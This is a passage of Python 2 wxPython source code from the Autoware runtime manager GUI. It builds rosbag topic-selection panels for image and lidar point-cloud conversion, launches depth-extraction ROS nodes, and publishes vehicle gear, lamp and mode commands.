for i, (topic_type, topic) in enumerate(self.topic_and_type_list):
if topic_type in topic_conversion_dic.keys():
select_topic_staticbox = wx.StaticBox(sss, wx.ID_ANY, "")
select_topic_staticbox.Lower()
sizer_select_topic = wx.StaticBoxSizer(select_topic_staticbox, wx.VERTICAL)
panelx = None
if topic_type == "velodyne_msgs/VelodyneScan":
panelx = wx.Panel(sss, wx.ID_ANY)
self.objx = wx.CheckBox(panelx, wx.ID_ANY, "Convert {0} To {1}".format("VelodyneScan", "PointCloud2"))
self.objx.SetValue(0)
self.objx.Disable()
self.objx.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnConvertVelodyne, self.objx)
self.buttonx = wx.ToggleButton(sss, wx.ID_ANY, _("Choose Lidar"))
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnGetLidar, self.buttonx)
upper_area = wx.BoxSizer( wx.HORIZONTAL)
upper_area.Add(panelx, 1, wx.ALL | wx.EXPAND, 4)
upper_area.Add(self.buttonx, 0, wx.ALL, 1)
sizer_select_topic.Add(upper_area)
topic = "/points_raw"
panel = wx.Panel(sss, wx.ID_ANY)
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
obj.SetValue(0)
if topic_type == "velodyne_msgs/VelodyneScan":
self.points_raw_save = obj
self.topic_type = topic_type
topic_type = "sensor_msgs/PointCloud2"
self.points_raw_save.Disable()
else:
self.topic_type = None
obj.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnConvertCheckedTopic, obj)
panel2 = wx.Panel(sss, wx.ID_ANY)
topic_sentence = "From {0} To {1}".format(topic_type, topic_conversion_dic[topic_type])
obj2 = wx.StaticText(panel2, wx.ID_ANY, topic_sentence)
#obj2.SetForegroundColour("#FF0000")
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj2.SetFont(font)
self.panel3 = wx.Panel(sss, wx.ID_ANY)
self.create_url_panel(sss, i, topic, topic_type, obj, "self.panel3")
up_area = wx.BoxSizer( wx.HORIZONTAL)
down_area = wx.BoxSizer(wx.HORIZONTAL)
up_area.Add(panel, 1, wx.ALL | wx.EXPAND, 4)
up_area.Add(panel2, 3, wx.TOP | wx.EXPAND | wx.LEFT, 6)
sizer_select_topic.Add(up_area)
down_area.Add(self.panel3, 1, wx.ALL | wx.EXPAND, 4)
sizer_select_topic.Add(down_area, 1, wx.EXPAND, 4)
szr.Add(sizer_select_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[0].append(sizer_select_topic)
sss.SetSizer(szr)
# sssb.Add(sss, 0, wx.EXPAND, 0)
sss.Layout()
sssb.Layout()
else:
wx.MessageBox("Please Set Bag File")
def get_all_topics(self):
bag_url = self.get_bag_url()
self.select_created_topic = {}
self.topic_type = None
if bag_url:
self.topic_and_type_list = get_type_and_topic(bag_url)
szr = self.sizer_select_topics
sss = self.select_scroll
sssb = self.sizer_select_box
if self.selected_topic_dic:
self.delete_launch()
self.delete_topic_panel(szr, num=0)
topic_conversion_dic = {
'sensor_msgs/Image' : "RGB Image",
'sensor_msgs/PointCloud2' : "PCD",
'velodyne_msgs/VelodyneScan' : "sensor_msgs/PointCloud2"
}
sizer_image_topic = None
sizer_pointcloud_topic = None
for topic_type, topic in self.topic_and_type_list:
if topic_type == "sensor_msgs/Image":
if sizer_image_topic == None:
select_image_staticbox = wx.StaticBox(sss, wx.ID_ANY, "Image")
select_image_staticbox.Lower()
sizer_image_topic = wx.StaticBoxSizer(select_image_staticbox, wx.VERTICAL)
if topic_type in ["sensor_msgs/PointCloud2", 'velodyne_msgs/VelodyneScan']:
if sizer_pointcloud_topic == None:
select_pointcloud_staticbox = wx.StaticBox(sss, wx.ID_ANY, "PointCloud")
select_pointcloud_staticbox.Lower()
sizer_pointcloud_topic = wx.StaticBoxSizer(select_pointcloud_staticbox, wx.VERTICAL)
for i, (topic_type, topic) in enumerate(self.topic_and_type_list):
if topic_type == "sensor_msgs/Image":
panelx = None
panel = wx.Panel(sss, wx.ID_ANY)
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
obj.SetValue(0)
self.topic_type = None
obj.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnConvertCheckedTopic, obj)
panel2 = wx.Panel(sss, wx.ID_ANY)
topic_sentence = "From {0} To {1}".format(topic_type, topic_conversion_dic[topic_type])
obj2 = wx.StaticText(panel2, wx.ID_ANY, topic_sentence)
#obj2.SetForegroundColour("#FF0000")
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj2.SetFont(font)
self.panel3 = wx.Panel(sss, wx.ID_ANY)
self.create_url_panel(sss, i, topic, topic_type, obj, "self.panel3")
up_area = wx.BoxSizer( wx.HORIZONTAL)
down_area = wx.BoxSizer(wx.HORIZONTAL)
up_area.Add(panel, 1, wx.ALL | wx.EXPAND, 4)
up_area.Add(panel2, 3, wx.TOP | wx.EXPAND | wx.LEFT, 6)
sizer_image_topic.Add(up_area)
down_area.Add(self.panel3, 1, wx.ALL | wx.EXPAND, 4)
sizer_image_topic.Add(down_area, 1, wx.EXPAND, 4)
for i, (topic_type, topic) in enumerate(self.topic_and_type_list):
if topic_type in ["velodyne_msgs/VelodyneScan", "sensor_msgs/PointCloud2"]:
# if topic_type in topic_conversion_dic.keys():
panelx = None
if topic_type == "velodyne_msgs/VelodyneScan":
panelx = wx.Panel(sss, wx.ID_ANY)
self.objx = wx.CheckBox(panelx, wx.ID_ANY, "Convert {0} To {1}".format("VelodyneScan", "PointCloud2"))
self.objx.SetValue(0)
self.objx.Disable()
self.objx.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnConvertVelodyne, self.objx)
self.buttonx = wx.ToggleButton(sss, wx.ID_ANY, _("Choose Lidar"))
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnGetLidar, self.buttonx)
upper_area = wx.BoxSizer( wx.HORIZONTAL)
upper_area.Add(panelx, 1, wx.ALL | wx.EXPAND, 4)
upper_area.Add(self.buttonx, 0, wx.ALL, 1)
sizer_pointcloud_topic.Add(upper_area)
topic = "/points_raw"
panel = wx.Panel(sss, wx.ID_ANY)
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
obj.SetValue(0)
if topic_type == "velodyne_msgs/VelodyneScan":
self.points_raw_save = obj
self.topic_type = topic_type
topic_type = "sensor_msgs/PointCloud2"
self.points_raw_save.Disable()
else:
self.topic_type = None
obj.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnConvertCheckedTopic, obj)
panel2 = wx.Panel(sss, wx.ID_ANY)
topic_sentence = "From {0} To {1}".format(topic_type, topic_conversion_dic[topic_type])
obj2 = wx.StaticText(panel2, wx.ID_ANY, topic_sentence)
#obj2.SetForegroundColour("#FF0000")
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj2.SetFont(font)
self.panel3 = wx.Panel(sss, wx.ID_ANY)
self.create_url_panel(sss, i, topic, topic_type, obj, "self.panel3")
up_area = wx.BoxSizer( wx.HORIZONTAL)
down_area = wx.BoxSizer(wx.HORIZONTAL)
up_area.Add(panel, 1, wx.ALL | wx.EXPAND, 4)
up_area.Add(panel2, 3, wx.TOP | wx.EXPAND | wx.LEFT, 6)
sizer_pointcloud_topic.Add(up_area)
down_area.Add(self.panel3, 1, wx.ALL | wx.EXPAND, 4)
sizer_pointcloud_topic.Add(down_area, 1, wx.EXPAND, 4)
if sizer_image_topic != None:
szr.Add(sizer_image_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[0].append(sizer_image_topic)
if sizer_pointcloud_topic != None:
szr.Add(sizer_pointcloud_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[0].append(sizer_pointcloud_topic)
sss.SetSizer(szr)
sss.Layout()
sssb.Layout()
else:
wx.MessageBox("Please Set Bag File")
def delete_topic_panel(self, szr, num=0):
topic_list = self.select_topic_delete_dic[num]
for topic in topic_list:
szr.Hide(topic)
szr.Remove(topic)
self.select_topic_delete_dic[num] = []
def delete_launch(self):
for k, val in self.selected_topic_dic.items():
k.SetValue(0)
self.launch_kill_proc2(k, self.cmd_dic)
val = self.selected_topic_dic.pop(k)
print("Kill '%s'" % self.cmd_dic[k][0])
self.cmd_dic.pop(k)
def OnConfirmDepth(self, event):
push = event.GetEventObject()
if self.button_confirm_depth.GetValue():
button_var = getattr(self, "button_" + "button_input100")
button_var2 = getattr(self, "button_" + "button_input101")
output_url = self.obj_to_varpanel_tc(button_var, 'file').GetValue()
calib_url = self.obj_to_varpanel_tc(button_var2, 'file').GetValue()
if ("Please Set Output Directory" == output_url) or (not output_url) or (" " in output_url):
self.button_confirm_depth.SetValue(0)
self.button_confirm_depth.SetBackgroundColour(wx.NullColour)
self.button_confirm_depth.SetForegroundColour(wx.NullColour)
wx.MessageBox("Please Set Correct Output Directory")
return
if output_url[-1] == "/":
output_url = output_url[:-1]
if not self.image_for_depth:
self.button_confirm_depth.SetValue(0)
self.button_confirm_depth.SetBackgroundColour(wx.NullColour)
self.button_confirm_depth.SetForegroundColour(wx.NullColour)
wx.MessageBox("Please Select Image Topic")
return
if not self.pointcloud_for_depth:
self.button_confirm_depth.SetValue(0)
self.button_confirm_depth.SetBackgroundColour(wx.NullColour)
self.button_confirm_depth.SetForegroundColour(wx.NullColour)
wx.MessageBox("Please Select Pointcloud Topic")
return
if ("Please Set Calibration File" == calib_url) or (not calib_url) or (" " in calib_url):
wx.MessageBox("Please Set Correct Calibration File URL")
self.button_confirm_depth.SetValue(0)
self.button_confirm_depth.SetBackgroundColour(wx.NullColour)
self.button_confirm_depth.SetForegroundColour(wx.NullColour)
return
else:
if not os.path.exists(output_url):
subprocess.call(['mkdir', '-p', output_url])
cmd = "rosrun data_preprocessor get_Depth %s %s %s %s" % (output_url, calib_url, self.image_for_depth, self.pointcloud_for_depth)
self.cmd_dic[push] = (cmd, None)
self.launch_kill_proc2(push, self.cmd_dic)
self.depth_flag = True
self.button_confirm_depth.SetBackgroundColour("#8B8BB9")
self.button_confirm_depth.SetForegroundColour("#F9F9F8")
#):('#F9F9F8','#8B8BB9'), (True,False):('#F9F9F8','#E0E0F0')
# self.selected_topic_dic[push] = push
print("launch '%s'" % self.cmd_dic[push][0])
else:
self.launch_kill_proc2(push, self.cmd_dic)
# val = self.selected_topic_dic.pop(push)
self.depth_flag = False
print("Kill '%s'" % self.cmd_dic[push][0])
self.button_confirm_depth.SetBackgroundColour(wx.NullColour)
self.button_confirm_depth.SetForegroundColour(wx.NullColour)
def get_depth_topic(self):
self.topic_type = None
bag_url = self.get_bag_url()
if bag_url:
self.topic_and_type_list = get_type_and_topic(bag_url)
szr = self.sizer_depth_topics
sss = self.depth_scroll
sssb = self.sizer_depth_box
#sssb.Remove(sss)
if self.selected_topic_dic:
self.delete_launch()
self.delete_topic_panel(szr, num=1)
topic_conversion_dic = {
'sensor_msgs/Image' : "RGB Image",
'sensor_msgs/PointCloud2' : "PCD",
'velodyne_msgs/VelodyneScan' : "sensor_msgs/PointCloud2"
}
is_image_topic = False
is_pointcloud_topic = False
select_image_staticbox = wx.StaticBox(sss, wx.ID_ANY, "Image")
select_image_staticbox.Lower()
sizer_image_topic = wx.StaticBoxSizer(select_image_staticbox, wx.VERTICAL)
select_pointcloud_staticbox = wx.StaticBox(sss, wx.ID_ANY, "PointCloud")
select_pointcloud_staticbox.Lower()
sizer_pointcloud_topic = wx.StaticBoxSizer(select_pointcloud_staticbox, wx.VERTICAL)
if True:
select_output_staticbox = wx.StaticBox(sss, wx.ID_ANY, "Depth Output Directory")
select_output_staticbox.Lower()
sizer_output_topic = wx.StaticBoxSizer(select_output_staticbox, wx.VERTICAL)
self.output_url = "output"
self.output_depth = wx.Panel(sss, wx.ID_ANY)
self.create_url_panel(sss, 100, "", "", self.output_url, "self.output_depth", file_type="dir", comment="Please Set Output Directory")
output_area = wx.BoxSizer( wx.HORIZONTAL)
output_area.Add(self.output_depth, 1, wx.ALL | wx.EXPAND, 4)
sizer_output_topic.Add(output_area, 1, wx.EXPAND, 4)
szr.Add(sizer_output_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[1].append(sizer_output_topic)
if True:
select_calib_staticbox = wx.StaticBox(sss, wx.ID_ANY, "Camera / Lidar Calibration File")
select_calib_staticbox.Lower()
sizer_calib_topic = wx.StaticBoxSizer(select_calib_staticbox, wx.VERTICAL)
self.calib_url = "calib"
self.panel_calibration = wx.Panel(sss, wx.ID_ANY)
self.create_url_panel(sss, 101, "", "", self.calib_url, "self.panel_calibration", file_type="file", comment="Please Set Calibration File")
calib_area = wx.BoxSizer( wx.HORIZONTAL)
calib_area.Add(self.panel_calibration, 1, wx.ALL | wx.EXPAND, 4)
sizer_calib_topic.Add(calib_area, 1, wx.EXPAND, 4)
szr.Add(sizer_calib_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[1].append(sizer_calib_topic)
for i, (topic_type, topic) in enumerate(self.topic_and_type_list):
i = i + 30
if topic_type == "sensor_msgs/Image":
is_image_topic = True
panel = wx.Panel(sss, wx.ID_ANY)
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
obj.SetValue(0)
obj.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnSelectImageCheckbox, obj)
self.select_created_topic[obj] = topic
panel2 = wx.Panel(sss, wx.ID_ANY)
topic_sentence = "From {0} To {1}".format(topic_type, topic_conversion_dic[topic_type])
obj2 = wx.StaticText(panel2, wx.ID_ANY, topic_sentence)
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj2.SetFont(font)
up_area = wx.BoxSizer( wx.HORIZONTAL)
up_area.Add(panel, 1, wx.ALL | wx.EXPAND, 4)
up_area.Add(panel2, 3, wx.TOP | wx.EXPAND | wx.LEFT, 6)
sizer_image_topic.Add(up_area)
for i, (topic_type, topic) in enumerate(self.topic_and_type_list):
if topic_type == "sensor_msgs/PointCloud2" or topic_type == "velodyne_msgs/VelodyneScan":
is_pointcloud_topic = True
panelx = None
if topic_type == "velodyne_msgs/VelodyneScan":
panelx = wx.Panel(sss, wx.ID_ANY)
self.velodyne_button = wx.CheckBox(panelx, wx.ID_ANY, "Convert {0} To {1}".format("VelodyneScan", "PointCloud2"))
self.velodyne_button.SetValue(0)
self.velodyne_button.Disable()
self.velodyne_button.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnConvertVelodyne, self.velodyne_button)
self.buttonx = wx.ToggleButton(sss, wx.ID_ANY, _("Choose Lidar"))
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnGetDepthLidar, self.buttonx)
upper_area = wx.BoxSizer( wx.HORIZONTAL)
upper_area.Add(panelx, 1, wx.ALL | wx.EXPAND, 4)
upper_area.Add(self.buttonx, 0, wx.ALL, 1)
sizer_pointcloud_topic.Add(upper_area)
topic = "/points_raw"
panel = wx.Panel(sss, wx.ID_ANY)
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
obj.SetValue(0)
if topic_type == "velodyne_msgs/VelodyneScan":
self.points_raw_depth = obj
self.topic_type = topic_type
topic_type = "sensor_msgs/PointCloud2"
self.points_raw_depth.Disable()
self.output_depth.Enable()
else:
self.topic_type = None
obj.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnSelectPointCheckbox, obj)
self.select_created_topic[obj] = topic
panel2 = wx.Panel(sss, wx.ID_ANY)
topic_sentence = "From {0} To {1}".format(topic_type, topic_conversion_dic[topic_type])
obj2 = wx.StaticText(panel2, wx.ID_ANY, topic_sentence)
#obj2.SetForegroundColour("#FF0000")
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj2.SetFont(font)
up_area = wx.BoxSizer( wx.HORIZONTAL)
up_area.Add(panel, 1, wx.ALL | wx.EXPAND, 4)
up_area.Add(panel2, 3, wx.TOP | wx.EXPAND | wx.LEFT, 6)
sizer_pointcloud_topic.Add(up_area)
if is_image_topic:
szr.Add(sizer_image_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[1].append(sizer_image_topic)
else:
topic_sentence = " Please choose the Bag File including Image Topic"
imagepanel = wx.Panel(sss, wx.ID_ANY)
obj = wx.StaticText(imagepanel, wx.ID_ANY, topic_sentence)
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj.SetFont(font)
obj.SetForegroundColour("#FF0000")
up_area = wx.BoxSizer( wx.HORIZONTAL)
up_area.Add(imagepanel, 1, wx.ALL | wx.EXPAND, 4)
sizer_image_topic.Add(up_area)
szr.Add(sizer_image_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[1].append(sizer_image_topic)
if is_pointcloud_topic:
szr.Add(sizer_pointcloud_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[1].append(sizer_pointcloud_topic)
else:
topic_sentence = " Please choose the Bag File including PointCloud Topic"
pointcloudpanel = wx.Panel(sss, wx.ID_ANY)
obj = wx.StaticText(pointcloudpanel, wx.ID_ANY, topic_sentence)
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj.SetFont(font)
obj.SetForegroundColour("#FF0000")
up_area = wx.BoxSizer( wx.HORIZONTAL)
up_area.Add(pointcloudpanel, 1, wx.ALL | wx.EXPAND, 4)
sizer_pointcloud_topic.Add(up_area)
szr.Add(sizer_pointcloud_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[1].append(sizer_pointcloud_topic)
sss.SetSizer(szr)
sss.Layout()
sssb.Layout()
else:
wx.MessageBox("Please Set Bag File")
def OnClose(self, event):
# kill_all
for proc in self.all_procs[:]: # copy
(_, obj) = self.proc_to_cmd_dic_obj(proc)
self.launch_kill(False, 'dmy', proc, obj=obj)
save_dic = {}
for (name, pdic) in self.load_dic.items():
if pdic and pdic != {}:
prm = self.cfg_dic( {'name':name, 'pdic':pdic} ).get('param', {})
no_saves = prm.get('no_save_vars', [])
pdic = pdic.copy()
for k in pdic.keys():
if k in no_saves:
del pdic[k]
save_dic[name] = pdic
if save_dic != {}:
dir = rtmgr_src_dir()
print('saving param.yaml')
f = open(dir + 'param.yaml', 'w')
s = yaml.dump(save_dic, default_flow_style=False)
f.write(s)
f.close()
shutdown_proc_manager()
shutdown_sh = self.get_autoware_dir() + '/ros/shutdown'
if os.path.exists(shutdown_sh):
os.system(shutdown_sh)
for thinf in self.all_th_infs:
th_end(thinf)
self.Destroy()
def ROSCb(self, data):
print('recv topic msg : ' + data.data)
r = rospy.Rate(10)
rospy.is_shutdown()
r.sleep()
self.pub.publish(data.data)
r.sleep()
def setup_buttons(self, d, run_dic):
for (k,d2) in d.items():
pfs = [ 'button_', 'checkbox_' ]
obj = next( (self.obj_get(pf+k) for pf in pfs if self.obj_get(pf+k)), None)
if not obj:
s = 'button_' + k
obj = StrValObj(s, False)
setattr(self, s, obj)
if not d2 or type(d2) is not dict:
continue
if 'run' in d2:
run_dic[obj] = (d2['run'], None)
set_tooltip(obj, d2)
gdic = self.gdic_get_1st(d2)
if 'param' in d2:
pdic = self.load_dic_pdic_setup(k, d2)
prm = self.get_param(d2.get('param'))
for var in prm.get('vars'):
name = var.get('name')
if name not in pdic and 'v' in var:
pdic[name] = var.get('v')
for (name, v) in pdic.items():
restore = eval( gdic.get(name, {}).get('restore', 'lambda a : None') )
restore(v)
self.add_cfg_info(obj, obj, k, pdic, gdic, False, prm)
pnls = [ gdic.get(var.get('name'), {}).get('panel') for var in prm.get('vars') ]
for pnl in [ gdic.get('panel') ] + pnls:
if pnl:
self.set_param_panel(obj, eval_if_str(self, pnl))
#self.set_param_panel(obj, pnl)
else:
self.add_cfg_info(obj, obj, k, None, gdic, False, None)
def OnGear(self, event):
grp = { self.button_statchk_d : 1,
self.button_statchk_r : 2,
self.button_statchk_b : 3,
self.button_statchk_n : 4 }
self.radio_action(event, grp.keys())
v = grp.get(event.GetEventObject())
if v is not None:
pub = rospy.Publisher('gear_cmd', gear_cmd, queue_size=10)
pub.publish(gear_cmd(gear=v))
def OnLamp(self, event):
pub = rospy.Publisher('lamp_cmd', LampCmd, queue_size=10)
msg = LampCmd()
msg.l = self.button_statchk_lamp_l.GetValue()
msg.r = self.button_statchk_lamp_r.GetValue()
pub.publish(msg)
def OnIndi(self, event):
pub = rospy.Publisher('indicator_cmd', IndicatorCmd, queue_size=10)
msg = IndicatorCmd()
msg.l = self.button_statchk_indi_l.GetValue()
msg.r = self.button_statchk_indi_r.GetValue()
pub.publish(msg)
def OnAutoPilot(self, event):
obj = event.GetEventObject()
self.alias_sync(obj)
v = obj.GetValue()
pub = rospy.Publisher('mode_cmd', mode_cmd, queue_size=10)
pub.publish(mode_cmd(mode=v))
def radio_action(self, event, grp):
push = event.GetEventObject()
for b in grp:
v = b.GetValue()
act = None
act = True if b is push and not v else act
act = False if b is not push and v else act
if act is not None:
set_val(b, act)
def stat_label_off(self, obj):
qs_nms = [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]
exec_time = self.runtime_dic.get('exec_time', {})
gdic = self.obj_to_gdic(obj, {})
msg = std_msgs.msg.Bool(False)
for k in gdic.get('stat_topic', []):
# exec_time off
if next( (dic for dic in exec_time.values() if k in dic), None):
self.exec_time_callback(std_msgs.msg.Float32(0), (k, 'data'))
else:
self.stat_callback(msg, k)
# Quick Start tab, exec_time off
obj_nm = self.name_get(obj)
nm = next( (nm for nm in qs_nms if 'button_' + nm + '_qs' == obj_nm), None)
for key in exec_time.get(nm, {}):
self.exec_time_callback(std_msgs.msg.Float32(0), (key, 'data'))
def route_cmd_callback(self, data):
self.route_cmd_waypoint = data.point
def stat_callback(self, msg, k):
self.stat_dic[k] = msg.data
if k == 'pmap':
v = self.stat_dic.get(k)
wx.CallAfter(self.label_point_cloud.SetLabel, 'OK' if v else '')
if k in [ 'pmap', 'vmap' ]:
v = self.stat_dic.get('pmap') and self.stat_dic.get('vmap')
wx.CallAfter(self.label_map_qs.SetLabel, 'OK' if v else '')
def exec_time_callback(self, msg, (key, attr)):
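# note: tuple unpacking in the parameter list is Python 2-only syntax, consistent with the print statements used elsewhere in this file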
msec = int(getattr(msg, attr, 0))
exec_time = self.runtime_dic.get('exec_time', {})
(nm, dic) = next( ( (nm, dic) for (nm, dic) in exec_time.items() if key in dic), None)
dic[ key ] = msec
lb = self.obj_get('label_' + nm + '_qs')
if lb:
sum = reduce( lambda a,b:a+(b if b else 0), dic.values(), 0 )
wx.CallAfter(lb.SetLabel, str(sum)+' ms' if sum > 0 else '')
# update Status tab
lb = ''
for nm in [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]:
dic = exec_time.get(nm, {})
sum = reduce( lambda a,b:a+(b if b else 0), dic.values(), 0 )
if sum > 0:
s = nm + ' : ' + str(sum) + ' ms'
lb += s + '\n'
wx.CallAfter(self.label_node_time.SetLabel, lb)
wx.CallAfter(self.label_node_time.GetParent().FitInside)
#
# Setup tab
#
def OnSetupLocalizer(self, event):
obj = self.button_setup_tf
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
self.update_func(pdic, gdic, prm)
#
# Computing Tab
#
def OnTreeMotion(self, event):
tree = event.GetEventObject()
pt = event.GetPosition()
event.Skip()
(item, flags) = tree.HitTest(pt)
if flags & CT.TREE_HITTEST_ONITEMLABEL == 0:
return
text = item.GetData()
if not text:
return
x = item.GetX()
y = item.GetY()
w = item.GetWidth()
h = item.GetHeight()
(x, y) = tree.CalcScrolledPosition(x, y)
iw = tree.GetItemWindow(item)
w -= iw.GetSize()[0] if iw else 0
if not wx.Rect(x, y, w, h).Contains(pt):
return
(x, y) = tree.ClientToScreen((x, y))
self.tip_info = (tree, text, wx.Rect(x, y, w, h))
if getattr(self, 'tip_timer', None) is None:
self.tip_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnTipTimer, self.tip_timer)
self.tip_timer.Start(200, oneShot=True)
def OnTipTimer(self, event):
if getattr(self, 'tip_info', None):
(tree, text, rect) = self.tip_info
(w, h) = self.GetSize()
wx.TipWindow(tree, text, maxLength=w, rectBound=rect)
def OnTreeChecked(self, event):
self.OnChecked_obj(event.GetItem())
def OnChecked_obj(self, obj):
self.OnLaunchKill_obj(obj)
def OnHyperlinked(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def OnHyperlinked_obj(self, obj):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return
dic_list_push(gdic, 'dialog_type', 'config')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
def obj_to_add_args(self, obj, msg_box=True):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return None
if 'need_camera_info' in gdic.get('flags', []) and msg_box:
ids = self.camera_ids()
if ids:
var = self.get_var(prm, 'camera_id', {})
var['choices'] = ids
dic_list_push(gdic, 'dialog_type', 'sel_cam')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
else:
pdic['camera_id'] = ''
if 'open_dialog' in gdic.get('flags', []) and msg_box:
dic_list_push(gdic, 'dialog_type', 'open')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
self.update_func(pdic, gdic, prm)
s = ''
vars = []
for var in prm.get('vars'):
cmd_param = var.get('cmd_param')
if cmd_param:
vars.append(var)
for var in vars[:]: # copy
cmd_param = var.get('cmd_param')
if cmd_param.get('tail'):
vars.remove(var)
vars.append(var)
for var in vars[:]: # copy
name = var.get('name')
flags = gdic.get(name, {}).get('flags', [])
if 'hide' in flags or 'disable' in flags:
vars.remove(var)
for var in vars:
cmd_param = var.get('cmd_param')
name = var.get('name')
v = pdic.get(name)
if (v is None or v == '') and 'default' in cmd_param:
v = cmd_param.get('default')
if dic_eval_if_str(self, cmd_param, 'must') and (v is None or v == ''):
print 'cmd_param', name, 'is required'
if msg_box:
wx.MessageBox('cmd_param ' + name + ' is required')
return False
if dic_eval_if_str(self, cmd_param, 'only_enable') and not v:
continue
if dic_eval_if_str(self, cmd_param, 'only_disable') and v:
continue
name = cmd_param.get('var_name', name)
unpack = cmd_param.get('unpack')
if unpack is not None:
v = ' '.join( v.split(unpack) )
add = ''
dash = cmd_param.get('dash')
if dash is not None:
add += dash + name
delim = cmd_param.get('delim')
if delim is not None:
str_v = str(v)
if var.get('kind') is None:
str_v = adjust_num_str(str_v)
if var.get('kind') == 'path':
str_v = path_expand_cmd(str_v)
str_v = os.path.expandvars(os.path.expanduser(str_v))
relpath_from = var.get('relpath_from')
if relpath_from:
relpath_from = path_expand_cmd(relpath_from)
relpath_from = os.path.expandvars(os.path.expanduser(relpath_from))
str_v = os.path.relpath(str_v, relpath_from)
add += delim + str_v
if add != '':
s += add + ' '
return s.strip(' ').split(' ') if s != '' else None
def obj_to_pdic_gdic_prm(self, obj, sys=False):
info = self.config_dic.get(obj)
if info is None:
sys_prm = self.get_param('sys')
prm_chk = lambda prm : prm is sys_prm if sys else prm is not sys_prm
info = next( ( v for v in self.config_dic.values() if v.get('obj') is obj and prm_chk(v.get('param')) ), None)
if info is None:
return (None, None, None)
pdic = info.get('pdic')
prm = info.get('param')
gdic = info.get('gdic')
return (pdic, gdic, prm)
def obj_to_gdic(self, obj, def_ret=None):
(_, gdic, _) = self.obj_to_pdic_gdic_prm(obj) if obj else (None, None, None)
return gdic if gdic else def_ret
def cfg_obj_dic(self, arg_dic, sys=False, def_ret=(None,{})):
sys_prm = self.get_param('sys')
prm_chk = {
True : (lambda prm : prm is sys_prm),
False : (lambda prm : prm is not sys_prm),
None : (lambda prm : True) }.get(sys)
arg_dic_chk = lambda dic: all( [ dic.get(k) == v for (k,v) in arg_dic.items() ] )
return next( ( (cfg_obj, dic) for (cfg_obj, dic) in self.config_dic.items() \
if arg_dic_chk(dic) and prm_chk(dic.get('param')) ), def_ret)
def cfg_dic(self, arg_dic, sys=False, def_ret={}):
(_, dic) = self.cfg_obj_dic(arg_dic, sys=sys, def_ret=(None, def_ret))
return dic
def cfg_prm_to_obj(self, arg_dic, sys=False):
return self.cfg_dic(arg_dic, sys=sys).get('obj')
def name_to_pdic_gdic_prm(self, name, sys=False):
d = self.cfg_dic( {'name':name}, sys=sys )
return ( d.get('pdic'), d.get('gdic'), d.get('param') )
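# Refresh pdic from each var's gdic 'func' (or from the var's default 'v' while
# pdic is still empty), run any update hooks, then propagate the change: publish
# the param topic (if 'pub' is set), sync rosparams, refresh dependent enables
# and the process CPU settings.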
def update_func(self, pdic, gdic, prm):
pdic_empty = (pdic == {})
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
func = gdic_v.get('func')
if func is None and not pdic_empty:
continue
